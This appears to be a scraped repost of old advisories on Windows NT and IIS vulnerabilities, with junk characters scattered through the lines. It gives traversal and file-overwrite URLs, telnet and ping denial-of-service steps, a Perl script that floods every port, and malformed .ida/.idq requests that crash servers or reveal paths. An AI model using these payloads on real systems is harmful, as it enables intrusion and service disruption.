NT的漏洞及描述(英文）

受影響系統(tǒng):4.0,iis 1.0
8 S( W9 c# R9 w) h, k" SA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
$ e0 n1 w( g! e
( B5 E( v) x( z: DA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
/ c3 [: F* `1 h, N( y
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
0 C3 l6 C( l* n" g) p
! K" M: c9 b. X, i$ I8 K; m--------------------------------------------------------------------

受影響系統(tǒng):4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
; H# j7 _; W4 H& n8 e
If the file 'target.bat' exists, the file will be truncated.

. ^& @$ Q. [& z8 D) S( K
$ b3 H0 G0 M# v6 L7 o/ aA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
( f' p3 t9 T. s5 _  J0 _
: S" z; @; [6 ?/ k----------------------------------------------------------------------
* \' Y4 |8 @. M
; M3 ?' F7 P( C/ U- K% _受影響系統(tǒng):3.51,4.0
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
; Z) w4 M; v* |3 n$ f
The following steps;

, L# d9 P6 i. [1 s8 R8 xTelnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
8 }! k' A3 x( c
) @! ?! Q: E$ p) K( Y2 o# c; Z1 eWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
; ]7 Q& k( T' l2 q
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
( y; k3 h2 c, H6 }1 Z  g
  ^8 X9 x: c* @0 ZThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

6 \9 I9 |. h/ K' U  e5 e/*begin poke code*/
( }1 N4 S2 f/ L- u; D4 W
use Socket;
use FileHandle;
require "chat2.pl";

$systemname = $ARGV[0] && shift;

* d# J; H& V8 O4 I; r$verbose = 1; # tell me what you're hitting
  M+ S6 w7 S- e7 G$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
{


+ v4 O- V  Q2 l" C8 `if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
. E! v, \0 G8 n0 k/ z6 C7 cnext;
}
! S4 _( w, t3 D' r7 s& g  L8 m5 }: G$fh = chat::open_port($systemname, $port);
chat::print ($fh,"This is about ten characters or more");
if ($verbose) {
print "Trying port: $port\n";
) m! j! I  @8 R$ i}
- C2 v0 P6 c1 }; Ychat::close($fh);
6 U  T" m! n. Q: Q  E2 N
}


/*end poke code*/

! p' a; O0 H! u/ |; eSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
/ `1 w/ J2 ^$ U
* ~7 [( I# Y3 F4 W# r  g1 [% l9 b3 g( P--------------------------------------------------------------------------------
) {8 d' P% k: T0 e  l6 x/ V+ b
4 R0 J& X; ?- h- N8 N: p2 u+ B受影響系統(tǒng):4.0
# X' H0 B; k) h6 t7 G3 @: ZUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
' P2 j& e  x! M- W) W, `# K9 ]
This attack causes Dr. Watson to display an alert window and to log an error:
, @. G1 G, h; ]! ^* n% B! I
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
! C, Z1 C" _) q/ X3 w
; e/ c1 b0 ]- Z3 C) i4 T! C--------------------------------------------------------------------------------
0 c  {/ ~- ?8 l0 f! X) T9 b- A9 a
& c/ A6 ]" N0 i- L受影響系統(tǒng):3.51,4.0
5 Z2 W+ x  Q; h, n  LLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
, @# k; v( ?% F
STOP: 0X0000001E
+ @9 k2 N8 f- N* M5 l. I: FKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

# p% A, @6 g& \0 q. i- a: C, dSTOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
1 z- g- a8 _/ A) i$ }
; `7 ^% z7 g/ {$ f" s--------------------------------------------------------------------------------

( k! s, [6 Y: p: eMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------
2 Y3 n2 D  b- F) W/ ^. _$ I! Z
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server